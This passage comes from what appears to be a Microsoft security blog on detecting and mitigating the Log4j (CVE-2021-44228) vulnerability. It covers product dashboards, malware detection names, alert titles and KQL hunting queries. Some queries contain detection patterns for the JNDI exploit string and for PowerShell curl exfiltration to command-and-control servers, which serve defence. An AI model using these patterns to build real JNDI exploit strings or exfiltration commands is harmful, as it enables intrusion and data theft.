tab](<https://security.microsoft.com/vulnerabilities/vulnerability/CVE-2021-44228/exposedDevices>) in the dedicated CVE-2021-44228 dashboard and review the **Mitigation status** column. Note that it may take a few hours for the updated mitigation status of a device to be reflected.\n\n![Screenshot of threat and vulnerability management showing mitigation status](https://www.microsoft.com/security/blog/uploads/securityprod/2021/12/TVM-mitigation-1.png)\n\n_Figure 6. Viewing each device\u2019s mitigation status_\n\n 2. Apply the mitigation (that is, turn off JNDI lookup) on devices directly from the portal. This feature is currently available for Windows devices only.\n\nThe mitigation will be applied directly via the Microsoft Defender for Endpoint client. To view the mitigation options, click on the **Mitigation options** button in the [Log4j dashboard](<https://security.microsoft.com/vulnerabilities/vulnerability/CVE-2021-44228/overview>):\n\n![Screenshot of Mitigation options button](https://www.microsoft.com/security/blog/uploads/securityprod/2021/12/TVM-mitigation-1a.png)\n\nYou can choose to apply the mitigation to all exposed devices or select specific devices for which you would like to apply it. To complete the process and apply the mitigation on devices, click **Create mitigation action**.\n\n![Screenshot of mitigation options](https://www.microsoft.com/security/blog/uploads/securityprod/2021/12/TVM-mitigation-2.png)\n\n_Figure 7. Creating mitigation actions for exposed devices._\n\nIn cases where the mitigation needs to be reverted, follow these steps:\n\n 1. Open an elevated PowerShell window\n 2. Run the following command:\n \n \n [Environment]::SetEnvironmentVariable(\"LOG4J_FORMAT_MSG_NO_LOOKUPS\", $null, [EnvironmentVariableTarget]::Machine)\n\nThe change will take effect after the device restarts.\n\n### Microsoft 365 Defender advanced hunting\n\nAdvance hunting can also surface affected software. This query looks for possibly vulnerable applications using the affected Log4j component. Triage the results to determine applications and programs that may need to be patched and updated.\n \n \n DeviceTvmSoftwareInventory\n | where SoftwareName contains \"log4j\"\n | project DeviceName, SoftwareName, SoftwareVersion\n\n![Screenshot of Microsoft 365 Defender advanced hunting](https://www.microsoft.com/security/blog/uploads/securityprod/2021/12/CVE-2021-44228-Log4j-M365D1-61b8efe612c24-1024x446.png)\n\n_Figure 8. Finding vulnerable software via advanced hunting_\n\n### Microsoft Defender for Cloud\n\n#### Microsoft Defender for servers\n\nOrganizations using Microsoft Defender for Cloud can use [Inventory tools](<https://docs.microsoft.com/azure/defender-for-cloud/asset-inventory>) to begin investigations before there\u2019s a CVE number. With Inventory tools, there are two ways to determine exposure across hybrid and multi-cloud resources:\n\n * Vulnerability assessment findings \u2013 Organizations who have enabled any of the vulnerability assessment tools (whether it's Microsoft Defender for Endpoint's [threat and vulnerability management](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-tvm>) module, the [built-in Qualys scanner](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-vm>), or a [bring your own license solution](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-byol-vm>)), they can search by CVE identifier:\n\n![Screenshot of Microsoft Defender for Cloud inventory tools searching by filters](https://www.microsoft.com/security/blog/uploads/securityprod/2021/12/CVE-2021-44228-Log4j-Cloud2b.png)\n\n_Figure 9. Searching vulnerability assessment findings by CVE identifier_\n\n * Software inventory - With the combined [integration with Microsoft Defender for Endpoint](<https://docs.microsoft.com/azure/defender-for-cloud/integration-defender-for-endpoint>) and [Microsoft Defender for servers](<https://docs.microsoft.com/azure/defender-for-cloud/defender-for-servers-introduction>), organizations can search for resources by installed applications and discover resources running the vulnerable software:\n\n![Screenshot of Microsoft Defender for Cloud inventory tools](https://www.microsoft.com/security/blog/uploads/securityprod/2021/12/CVE-2021-44228-Log4j-Cloud1b.png)\n\n_Figure 10. Searching software inventory by installed applications_\n\nNote that this doesn\u2019t replace a search of your codebase. It\u2019s possible that software with integrated Log4j libraries won\u2019t appear in this list, but this is helpful in the initial triage of investigations related to this incident. For more information about how Microsoft Defender for Cloud finds machines affected by CVE-2021-44228, read this [tech community post](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-cloud/how-defender-for-cloud-finds-machines-affected-by-log4j/ba-p/3037271>).\n\n#### Microsoft Defender for Containers\n\nMicrosoft Defender for Containers is capable of discovering images affected by the vulnerabilities recently discovered in Log4j 2: [CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>), [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>), and [CVE-2021-45105](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>). Images are automatically scanned for vulnerabilities in three different use cases: when pushed to an Azure container registry, when pulled from an Azure container registry, and when container images are running on a Kubernetes cluster. Additional information on supported scan triggers and Kubernetes clusters can be found [here](<https://docs.microsoft.com/azure/defender-for-cloud/defender-for-containers-introduction?tabs=defender-for-container-arch-aks>). \n\nLog4j binaries are discovered whether they are deployed via a package manager, copied to the image as stand-alone binaries, or included within a JAR Archive (up to one level of nesting). \n\nWe will continue to follow up on any additional developments and will update our detection capabilities if any additional vulnerabilities are reported.\n\n**Finding affected images**\n\nTo find vulnerable images across registries using the Azure portal, navigate to the **Microsoft Defender for Cloud** service under Azure Portal. Open the **Container Registry images should have vulnerability findings resolved** recommendation and search findings for the relevant CVEs. \n\n![Screenshot of Microsoft Defender for Containers findings of images with vulnerability](https://www.microsoft.com/security/blog/uploads/securityprod/2021/12/Log4j-Defender-for-Containers-1-1024x507.png)\n\n_Figure 11. Finding images with the CVE-2021-45046 vulnerability_ \n\n**Find vulnerable running images on Azure portal [preview] **\n\nTo view only vulnerable images that are currently running on a Kubernetes cluster using the Azure portal, navigate to the **Microsoft Defender for Cloud** service under Azure Portal. Open the **Vulnerabilities in running container images should be remediated (powered by Qualys)** recommendation and search findings for the relevant CVEs: \n\n![Screenshot of Microsoft Defender for Containers showing vulnerabilities in running container images](https://www.microsoft.com/security/blog/uploads/securityprod/2021/12/Log4j-Defender-for-Containers-2-1024x504.png)\n\n_Figure 12. Finding running images with the CVE-2021-45046 vulnerability _\n\nNote: This recommendation requires clusters to run Microsoft Defender security profile to provide visibility on running images.\n\n**Search Azure Resource Graph data ******\n\nAzure Resource Graph (ARG) provides instant access to resource information across cloud environments with robust filtering, grouping, and sorting capabilities. It's a quick and efficient way to query information across Azure subscriptions programmatically or from within the Azure portal. ARG provides another way to query resource data for resources found to be affected by the Log4j vulnerability.\n\nThe following query finds resources affected by the Log4j vulnerability across subscriptions. Use the additional data field across all returned results to obtain details on vulnerable resources: \n \n \n securityresources \n | where type =~ \"microsoft.security/assessments/subassessments\"\n | extend assessmentKey=extract(@\"(?i)providers/Microsoft.Security/assessments/([^/]*)\", 1, id), subAssessmentId=tostring(properties.id), parentResourceId= extract(\"(.+)/providers/Microsoft.Security\", 1, id)\n | extend Props = parse_json(properties)\n | extend additionalData = Props.additionalData\n | extend cves = additionalData.cve\n | where isnotempty(cves) and array_length(cves) > 0\n | mv-expand cves\n | where tostring(cves) has \"CVE-2021-44228\" or tostring(cves) has \"CVE-2021-45046\" or tostring(cves) has \"CVE-2021-45105\" \n\n### Microsoft Sentinel queries\n\nMicrosoft Sentinel customers can use the following detection query to look for devices that have applications with the vulnerability:\n\n * [Vulnerable machines related to Log4j CVE-2021-44228](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityNestedRecommendation/Log4jVulnerableMachines.yaml>)\n\nThis query uses the Microsoft Defender for Cloud nested recommendations data to find machines vulnerable to Log4j CVE-2021-44228.\n\nMicrosoft Sentinel also provides a CVE-2021-44228 Log4Shell Research Lab Environment for testing the vulnerability: <https://github.com/OTRF/Microsoft-Sentinel2Go/tree/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell>\n\n### RiskIQ EASM and Threat Intelligence\n\nRiskIQ has published a few threat intelligence articles on this CVE, with mitigation guidance and IOCs. The latest one with links to previous articles can be found [here](<https://community.riskiq.com/article/67ba1386>). Both Community users and enterprise customers can search within the threat intelligence portal for data about potentially vulnerable components exposed to the Internet. For example, it's possible to [surface all observed instances of Apache](<https://community.riskiq.com/search/components?category=Server&query=Apache>) or [Java](<https://community.riskiq.com/research?query=java>), including specific versions. Leverage this method of exploration to aid in understanding the larger Internet exposure, while also filtering down to what may impact you. \n\nFor a more automated method, registered users can view their attack surface to understand tailored findings associated with their organization. Note, you must be registered with a corporate email and the automated attack surface will be limited. Digital Footprint customers can immediately understand what may be vulnerable and act swiftly and resolutely using the [Attack Surface Intelligence Dashboard](<https://app.riskiq.net/a/main/index#/dashboards/379/RiskIQ%20Attack%20Intelligence%20Dashboard>) Log4J Insights tab. \n\n## Detecting and responding to exploitation attempts and other related attacker activity\n\n### Microsoft 365 Defender\n\nMicrosoft 365 Defender coordinates multiple security solutions that detect components of observed attacks taking advantage of this vulnerability, from exploitation attempts to remote code execution and post-exploitation activity.\n\n![Diagram of attack chain of threats taking advantage of the Log4j 2 vulnerability and how Microsoft solutions detect attacks](https://www.microsoft.com/security/blog/uploads/securityprod/2021/12/Log4j-Microsoft-365-Defender-ff-1024x709.png)\n\n_Figure 13. Microsoft 365 Defender solutions protect against related threats_\n\nCustomers can click **Need help?** in the Microsoft 365 Defender portal to open up a search widget. Customers can key in \u201cLog4j\u201d to search for in-portal resource, check if their network is affected, and work on corresponding actionable items to mitigate them.\n\n#### Microsoft Defender Antivirus\n\nTurn on cloud-delivered protection in Microsoft Defender Antivirus to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block the majority of new and unknown variants. Microsoft Defender Antivirus detects components and behaviors related to this threat as the following detection names:\n\nOn Windows:\n\n * [Trojan:Win32/Capfetox.AA](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Capfetox.AA&threatId=-2147159827>)- detects attempted exploitation on the attacker machine\n * [HackTool:Win32/Capfetox.A!dha](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=HackTool:Win32/Capfetox.A!dha&threatId=-2147159807>) - detects attempted exploitation on the attacker machine\n * [VirTool:Win64/CobaltSrike.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=VirTool:Win64/CobaltStrike.A&threatId=-2147200161>), [TrojanDropper:PowerShell/Cobacis.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDropper:PowerShell/Cobacis.A&threatId=-2147200375>) - detects Cobalt Strike Beacon loaders\n * [TrojanDownloader:Win32/CoinMiner](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Win32/CoinMiner&threatId=-2147257370>) - detects post-exploitation coin miner\n * [Trojan:Win32/WebToos.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/WebToos.A&threatId=-2147278986>) - detects post-exploitation PowerShell\n * [Ransom:MSIL/Khonsari.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:MSIL/Khonsari.A&threatId=-2147159485>) - detects a strain of the Khonsari ransomware family observed being distributed post-exploitation\n * [Trojan:Win64/DisguisedXMRigMiner](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win64/DisguisedXMRigMiner&threatId=-2147169351>) - detects post-exploitation cryptocurrency miner\n * [TrojanDownloader:Java/Agent.S](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Java/Agent.S&threatId=-2147159796>) - detects suspicious class files used in post-exploitation\n * [TrojanDownloader:PowerShell/NitSky.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:PowerShell/NitSky.A&threatId=-2147157401>) - detects attempts to download CobaltStrike Beacon payload\n\nOn Linux:\n\n * [Trojan:Linux/SuspectJavaExploit.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/SuspectJavaExploit.A&threatId=-2147159829>), [Trojan:Linux/SuspectJavaExploit.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/SuspectJavaExploit.B&threatId=-2147159828>), [Trojan:Linux/SuspectJavaExploit.C](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/SuspectJavaExploit.C&threatId=-2147159808>) - blocks Java processes downloading and executing payload through output redirection\n * [Trojan:Linux/BashMiner.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/BashMiner.A&threatId=-2147159832>) - detects post-exploitation cryptocurrency miner\n * [TrojanDownloader:Linux/CoinMiner](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/CoinMiner&threatId=-2147241315>) - detects post-exploitation cryptocurrency miner\n * [TrojanDownloader:Linux/Tusnami](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/Tusnami.A&threatId=-2147159794>) - detects post-exploitation Backdoor Tsunami downloader\n * [Backdoor:Linux/Tusnami.C](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Linux/Tusnami.C!MTB&threatId=-2147178887>) - detects post-exploitation Tsunami backdoor\n * [Backdoor:Linux/Setag.C](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Linux/Setag.C&threatId=-2147277056>) - detects post-exploitation Gates backdoor\n * [Exploit:Linux/CVE-2021-44228.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Linux/CVE-2021-44228.A&threatId=-2147159804>), [Exploit:Linux/CVE-2021-44228.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Linux/CVE-2021-44228.B&threatId=-2147159803>) - detects exploitation\n * [TrojanDownloader:Linux/Capfetox.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/Capfetox.A&threatId=-2147159639>), [TrojanDownloader:Linux/Capfetox.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/Capfetox.B&threatId=-2147159640>)\n * [TrojanDownloader:Linux/ShAgnt!MSR](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/ShAgnt!MSR&threatId=-2147159432>), [TrojanDownloader:Linux/ShAgnt.A!MTB](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/ShAgnt.A!MTB&threatId=-2147159607>)\n * [Trojan:Linux/Kinsing.L](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/Kinsing.L&threatId=-2147189973>) - detects post-exploitation cryptocurrency Kinsing miner\n * [Trojan:Linux/Mirai.TS!MTB](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/Mirai.TS!MTB&threatId=-2147159629>) - detects post-exploitation Mirai malware capable of performing DDoS\n * [Backdoor:Linux/Dakkatoni.az!MTB](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Linux/Dakkatoni.az!MTB&threatId=-2147205141>) - detects post-exploitation Dakkatoni backdoor trojan capable of downloading more payloads\n * [Trojan:Linux/JavaExploitRevShell.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/JavaExploitRevShell.A&threatId=-2147159631>) - detects reverse shell attack post-exploitation\n * [Trojan:Linux/BashMiner.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/BashMiner.A&threatId=-2147159832>), [Trojan:Linux/BashMiner.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/BashMiner.B&threatId=-2147159820>) - detects post-exploitation cryptocurrency miner\n\n#### Microsoft Defender for Endpoint\n\nUsers of Microsoft Defender for Endpoint can turn on the following attack surface reduction rule to block or audit some observed activity associated with this threat.\n\n * Block executable files from running unless they meet a prevalence, age, or trusted list criterion\n\nDue to the broad network exploitation nature of vectors through which this vulnerability can be exploited and the fact that applying mitigations holistically across large environments will take time, we encourage defenders to look for signs of post-exploitation rather than fully relying on prevention. Observed post exploitation activity such as coin mining, lateral movement, and Cobalt Strike are detected with behavior-based detections.\n\nAlerts with the following titles in the Security Center indicate threat activity related to exploitation of the Log4j vulnerability on your network and should be immediately investigated and remediated. These alerts are supported on both Windows and Linux platforms: \n\n * **Log4j exploitation detected** \u2013 detects known behaviors that attackers perform following successful exploitation of the CVE-2021-44228 vulnerability\n * **Log4j exploitation artifacts detected** (previously titled Possible exploitation of CVE-2021-44228) \u2013 detects coin miners, shells, backdoor, and payloads such as Cobalt Strike used by attackers post-exploitation\n * **Log4j exploitation network artifacts detected** (previously titled Network connection seen in CVE-2021-44228 exploitation) - detects network traffic connecting traffic connecting to an address associated with CVE-2021-44228 scanning or exploitation activity \n\nThe following alerts may indicate exploitation attempts or testing/scanning activity. Microsoft advises customers to investigate with caution, as these alerts don\u2019t necessarily indicate successful exploitation:\n\n * **Possible target of Log4j exploitation - **detects a possible attempt to exploit the remote code execution vulnerability in the Log4j component of an Apache server in communication __received by__ this device\n * **Possible target of Log4j vulnerability scanning** \u2013 detects a possible __attempt to scan__ for the remote code execution vulnerability in a Log4j component of an Apache server in communication received by this device\n * **Possible source of Log4j exploitation** \u2013 detects a possible attempt to exploit the remote code execution vulnerability in the Log4j component of an Apache server in communication __initiated from__ this device \n * **Possible Log4j exploitation** - detects multiple behaviors, including suspicious command launch post-exploitation\n * **Possible Log4j exploitation (CVE-2021-44228)** \u2013 inactive, initially covered several of the above, now replaced with more specific titles\n\nThe following alerts detect activities that have been observed in attacks that utilize at least one of the Log4j vulnerabilities. However, these alerts can also indicate activity that is not related to the vulnerability. We are listing them here, as it is highly recommended that they are triaged and remediated immediately given their severity and the potential that they could be related to Log4j exploitation:\n\n * Suspicious remote PowerShell execution \n * Download of file associated with digital currency mining \n * Process associated with digital currency mining \n * Cobalt Strike command and control detected \n * Suspicious network traffic connection to C2 Server \n * Ongoing hands-on-keyboard attacker activity detected (Cobalt Strike) \n\nSome of the alerts mentioned above utilize the enhanced network inspection capabilities in Microsoft Defender for Endpoint. These alerts correlate several network and endpoint signals into high-confidence detection of successful exploitation, as well as providing detailed evidence artifacts valuable for triage and investigation of detected activities.\n\n![Screenshot of Microsoft Defender for Endpoint alert Log4j exploitation detected](https://www.microsoft.com/security/blog/uploads/securityprod/2021/12/Log4j-MDE-8-1024x668.png)\n\n_Figure 14. Example detection leveraging network inspection provides details about the Java class returned following successful exploitation_\n\n#### Microsoft Defender for Cloud Apps (previously Microsoft Cloud App Security)\n\nMicrosoft 365 Defender detects exploitation patterns in different data sources, including cloud application traffic reported by Microsoft Defender for Cloud Apps. The following alert surfaces exploitation attempts via cloud applications that use vulnerable Log4j components:\n\n * Log4j exploitation attempt via cloud application (previously titled Exploitation attempt against Log4j (CVE-2021-44228))\n\n![Screenshot of Microsoft 365 Defender alert ](https://www.microsoft.com/security/blog/uploads/securityprod/2021/12/CVE-2021-44228-Log4j-M365D-CloudApps-1-1024x638.png)\n\n_Figure 15. Microsoft 365 Defender alert "Exploitation attempt against Log4j (CVE-2021-4428)"_\n\n#### Microsoft Defender for Office 365\n\nTo add a layer of protection against exploits that may be delivered via email, Microsoft Defender for Office 365 flags suspicious emails (e.g., emails with the \u201cjndi\u201d string in email headers or the sender email address field), which are moved to the Junk folder.\n\nWe also added the following new alert, which detects attempts to exploit CVE-2021-44228 through email headers:\n\n * Log4j exploitation attempt via email (previously titled Log4j Exploitation Attempt \u2013 Email Headers (CVE-2021-44228))\n\n![Screenshot of Microsoft Defender for Office 365 detection of Log4j exploitation attempt using email headers](https://www.microsoft.com/security/blog/uploads/securityprod/2021/12/Log4j-MDO-1.png)\n\n_Figure 16. __Sample alert on malicious sender display name found in email correspondence_\n\nThis detection looks for exploitation attempts in email headers, such as the sender display name, sender, and recipient addresses. The alert covers known obfuscation attempts that have been observed in the wild. If this alert is surfaced, customers are recommended to evaluate the source address, email subject, and file attachments to get more context regarding the authenticity of the email.\n\n![Screenshot of sample email with exploit sting in subject](https://www.microsoft.com/security/blog/uploads/securityprod/2021/12/Log4j-MDO-2.png)\n\n_Figure 17. Sample email with malicious sender display name_\n\nIn addition, this email event as can be surfaced via advanced hunting:\n\n![Screenshot of email event surfaced via advanced hunting](https://www.microsoft.com/security/blog/uploads/securityprod/2021/12/Log4j-MDO-3.png)\n\n_Figure 18. Sample email event surfaced via advanced hunting _\n\n#### Microsoft 365 Defender advanced hunting queries\n\nTo locate possible exploitation activity, run the following queries:\n\n**Possible malicious indicators in cloud application events**\n\nThis query is designed to flag exploitation attempts for cases where the attacker is sending the crafted exploitation string using vectors such as User-Agent, Application or Account name. The hits returned from this query are most likely unsuccessful attempts, however the results can be useful to identity attackers\u2019 details such as IP address, Payload string, Download URL, etc. \n \n \n CloudAppEvents\n | where Timestamp > datetime(\"2021-12-09\")\n | where UserAgent contains \"jndi:\" \n or AccountDisplayName contains \"jndi:\"\n or Application contains \"jndi:\"\n or AdditionalFields contains \"jndi:\"\n | project ActionType, ActivityType, Application, AccountDisplayName, IPAddress, UserAgent, AdditionalFields\n\n**Alerts related to Log4j vulnerability**\n\nThis query looks for alert activity pertaining to the Log4j vulnerability.\n \n \n AlertInfo\n | where Title in~('Suspicious script launched',\n 'Exploitation attempt against Log4j (CVE-2021-44228)',\n 'Suspicious process executed by a network service',\n 'Possible target of Log4j exploitation (CVE-2021-44228)',\n 'Possible target of Log4j exploitation',\n 'Possible Log4j exploitation',\n 'Network connection seen in CVE-2021-44228 exploitation',\n 'Log4j exploitation detected',\n 'Possible exploitation of CVE-2021-44228',\n 'Possible target of Log4j vulnerability (CVE-2021-44228) scanning',\n 'Possible source of Log4j exploitation',\n 'Log4j exploitation attempt via cloud application', // Previously titled Exploitation attempt against Log4j\n 'Log4j exploitation attempt via email' // Previously titled Log4j Exploitation Attempt\n )\n\n**Devices with Log4j vulnerability alerts and additional other alert-related context**\n\nThis query surfaces devices with Log4j-related alerts and adds additional context from other alerts on the device. \n \n \n // Get any devices with Log4J related Alert Activity\n let DevicesLog4JAlerts = AlertInfo\n | where Title in~('Suspicious script launched',\n 'Exploitation attempt against Log4j (CVE-2021-44228)',\n 'Suspicious process executed by a network service',\n 'Possible target of Log4j exploitation (CVE-2021-44228)',\n 'Possible target of Log4j exploitation',\n 'Possible Log4j exploitation',\n 'Network connection seen in CVE-2021-44228 exploitation',\n 'Log4j exploitation detected',\n 'Possible exploitation of CVE-2021-44228',\n 'Possible target of Log4j vulnerability (CVE-2021-44228) scanning',\n 'Possible source of Log4j exploitation'\n 'Log4j exploitation attempt via cloud application', // Previously titled Exploitation attempt against Log4j\n 'Log4j exploitation attempt via email' // Previouskly titled Log4j Exploitation Attempt\n )\n // Join in evidence information\n | join AlertEvidence on AlertId\n | where DeviceId != \"\"\n | summarize by DeviceId, Title;\n // Get additional alert activity for each device\n AlertEvidence\n | where DeviceId in(DevicesLog4JAlerts)\n // Add additional info\n | join kind=leftouter AlertInfo on AlertId\n | summarize DeviceAlerts = make_set(Title), AlertIDs = make_set(AlertId) by DeviceId, bin(Timestamp, 1d)\n\n**Suspected exploitation of Log4j vulnerability**\n\nThis query looks for exploitation of the vulnerability using known parameters in the malicious string. It surfaces exploitation but may surface legitimate behavior in some environments.\n \n \n DeviceProcessEvents\n | where ProcessCommandLine has_all('${jndi') and ProcessCommandLine has_any('ldap', 'ldaps', 'http', 'rmi', 'dns', 'iiop')\n //Removing FPs \n | where not(ProcessCommandLine has_any('stackstorm', 'homebrew')) \n\n**Regex to identify malicious exploit string**\n\nThis query looks for the malicious string needed to exploit this vulnerability.\n \n \n DeviceProcessEvents\n | where ProcessCommandLine matches regex @'(?i)\\$\\{jndi:(ldap|http|https|ldaps|dns|rmi|iiop):\\/\\/(\\$\\{([a-z]){1,20}:([a-z]){1,20}\\})?(([a-zA-Z0-9]|-){2,100})?(\\.([a-zA-Z0-9]|-){2,100})?\\.([a-zA-Z0-9]|-){2,100}\\.([a-z0-9]){2,20}(\\/).*}' \n or InitiatingProcessCommandLine matches regex @'(?i)\\$\\{jndi:(ldap|http|https|ldaps|dns|rmi|iiop):\\/\\/(\\$\\{([a-z]){1,20}:([a-z]){1,20}\\})?(([a-zA-Z0-9]|-){2,100})?(\\.([a-zA-Z0-9]|-){2,100})?\\.([a-zA-Z0-9]|-){2,100}\\.([a-z0-9]){2,20}(\\/).*}'\n\n**Suspicious process event creation from VMWare Horizon TomcatService**\n\nThis query identifies anomalous child processes from the _ws_TomcatService.exe_ process associated with the exploitation of the Log4j vulnerability in VMWare Horizon installations. These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application.\n \n \n DeviceProcessEvents\n | where InitiatingProcessFileName has \"ws_TomcatService.exe\"\n | where FileName != \"repadmin.exe\"\n\n**Suspicious JScript staging comment**\n\nThis query identifies a unique string present in malicious PowerShell commands attributed to threat actors exploiting vulnerable Log4j applications. These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application.\n \n \n DeviceProcessEvents\n | where FileName has \"powershell.exe\"\n | where ProcessCommandLine has \"VMBlastSG\"\n \n\n**Suspicious PowerShell curl flags**\n\nThis query identifies unique, uncommon PowerShell flags used by curl to post the results of an attacker-executed command back to the command-and-control infrastructure. If the event is a true positive, the contents of the \u201cBody\u201d argument are Base64-encoded results from an attacker-issued comment. These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application.\n \n \n DeviceProcessEvents\n | where FileName has \"powershell.exe\"\n | where ProcessCommandLine has_all(\"-met\", \"POST\", \"-Body\")\n\n### Microsoft Defender for Cloud\n\nMicrosoft Defender for Cloud\u2019s threat detection capabilities have been expanded to surface exploitation of CVE-2021-44228 in several relevant security alerts:\n\nOn Windows:\n\n * Detected obfuscated command line\n * Suspicious use of PowerShell detected\n\nOn Linux:\n\n * Suspicious file download\n * Possible Cryptocoinminer download detected\n * Process associated with digital currency mining detected\n * Potential crypto coin miner started\n * A history file has been cleared\n * Suspicious Shell Script Detected\n * Suspicious domain name reference\n * Digital currency mining related behavior detected\n * Behavior similar to common Linux bots detected\n\n### Microsoft Defender for IoT\n\nMicrosoft Defender for IoT has released a dedicated threat Intelligence update package for detecting Log4j 2 exploit attempts on the network (example below). \n\n![Screenshot of Microsoft Defender for IoT detection for suspicious activity](https://www.microsoft.com/security/blog/uploads/securityprod/2021/12/CVE-2021-44228-Log4j-IOT1c-1024x482.png)\n\n_Figure 19. Microsoft Defender for IoT alert_ \n\nThe package is available for download from the [Microsoft Defender for IoT portal](<https://ms.portal.azure.com/#blade/Microsoft_Azure_IoT_Defender/IoTDefenderDashboard/Getting_Started>) (Click _Updates_, then _Download file _(MD5: 4fbc673742b9ca51a9721c682f404c41). \n\n![Screenshot of Microsoft Defender for IoT intelligence udpate](https://www.microsoft.com/security/blog/uploads/securityprod/2021/12/CVE-2021-44228-Log4j-IOT2b.png)\n\n_Figure 20. Microsoft Defender for IoT sensor threat intelligence update_\n\nMicrosoft Defender for IoT now pushes new threat intelligence packages to cloud-connected sensors upon release, [click here ](<https://docs.microsoft.com/en-us/azure/defender-for-iot/organizations/release-notes>)for more information. Starting with sensor version 10.3, users can automatically receive up-to-date threat intelligence packages through Microsoft Defender for IoT.\n\nWorking with automatic updates reduces operational effort and ensures greater security. Enable automatic updating on the [Defender for IoT portal](<https://ms.portal.azure.com/#blade/Microsoft_Azure_IoT_Defender/IoTDefenderDashboard/Sites>) by onboarding your cloud-connected sensor with the toggle for Automatic Threat Intelligence Updates turned on. For more information about threat intelligence packages in Defender for IoT, please refer to the [documentation](<https://docs.microsoft.com/en-us/azure/defender-for-iot/organizations/how-to-work-with-threat-intelligence-packages>).\n\n### Microsoft Sentinel\n\nA new Microsoft Sentinel solution has been added to the Content Hub that provides a central place to install Microsoft Sentinel specific content to monitor, detect, and investigate signals related to exploitation of the CVE-2021-44228 vulnerability.\n\n![Screenshot of Log4j vulnerability detection solution in Microsoft Sentinel](https://www.microsoft.com/security/blog/uploads/securityprod/2021/12/CVE-2021-44228-Log4j-Sentinel-2.png)\n\n_Figure 21. Log4j Vulnerability Detection solution in Microsoft Sentinel_\n\nTo deploy this solution, in the Microsoft Sentinel portal, select **Content hub (Preview)** under **Content Management**, then search for **Log4j** in the search bar. Select the **Log4j vulnerability detection** solution, and click **Install**. Learn how to [centrally discover and deploy Microsoft Sentinel out-of-the-box content and solutions](<https://docs.microsoft.com/azure/sentinel/sentinel-solutions-deploy>).\n\n![Screenshot of Microsoft Sentinel showing rules ](https://www.microsoft.com/security/blog/uploads/securityprod/2021/12/CVE-2021-44228-Log4j-Sentinel-4.png)\n\n_Figure 22. Microsoft Sentinel Analytics showing detected Log4j vulnerability_\n\nNote: We recommend that you check the solution for updates periodically, as new collateral may be added to this solution given the rapidly evolving situation. This can be verified on the main Content hub page.\n\n#### Microsoft Sentinel queries\n\nMicrosoft Sentinel customers can use the following detection queries to look for this activity:\n\n * [Possible exploitation of Apache Log4j component detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Apache_log4j_Vulnerability.yaml>)\n\nThis hunting query looks for possible attempts to exploit a remote code execution vulnerability in the Log4j component of Apache. Attackers may attempt to launch arbitrary code by passing specific commands to a server, which are then logged and executed by the Log4j component.\n\n * [Cryptocurrency miners EXECVE](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/CryptoCurrencyMiners.yaml>)\n\nThis query hunts through EXECVE syslog data generated by AUOMS to find instances of cryptocurrency miners being downloaded. It returns a table of suspicious command lines.\n\n * [Azure WAF Log4j CVE-2021-44228 